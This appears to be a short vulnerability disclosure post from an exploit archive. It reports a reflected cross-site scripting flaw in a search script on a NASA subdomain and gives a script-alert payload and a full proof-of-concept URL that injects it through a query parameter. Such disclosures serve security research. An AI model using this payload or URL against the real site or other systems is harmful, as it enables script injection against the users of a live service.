NASA Subdomain XSS Vulnerability

2015.12.31
Credit: 4TT4CK3R
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title : NASA Subdomain XSS Vulnerability # Exploit Author : 4TT4CK3R # Date : 2015/12/27 # Tested on : Kali linux , Windows 8.1 # Vendor HomePage : https://ghrc.nsstc.nasa.gov/ # Google Dork : No # Category : Web Application ~ # : Vulnerable Location :https://ghrc.nsstc.nasa.gov/hydro/search.pl ~ # : Using this script for XSS Vunerability Testing : <script>alert('4TT4CK3R')</script> ~ # : Our Finally address is :https://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=%3Cscript%3Ealert%28%274TT4CK3R%27%29%3C/script%3E # Discovered by : 4TT4CK3R # Hacker is not who deface a website with GoogleDork Which it shared with another person :) # I know nothing, It's too soon to say "I KNOW" # Cyber Police


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top